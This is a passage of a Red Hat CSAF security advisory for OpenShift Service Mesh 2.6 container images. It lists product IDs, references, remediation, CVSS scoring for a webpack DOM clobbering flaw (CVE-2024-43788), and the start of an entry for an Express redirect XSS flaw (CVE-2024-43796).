"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational 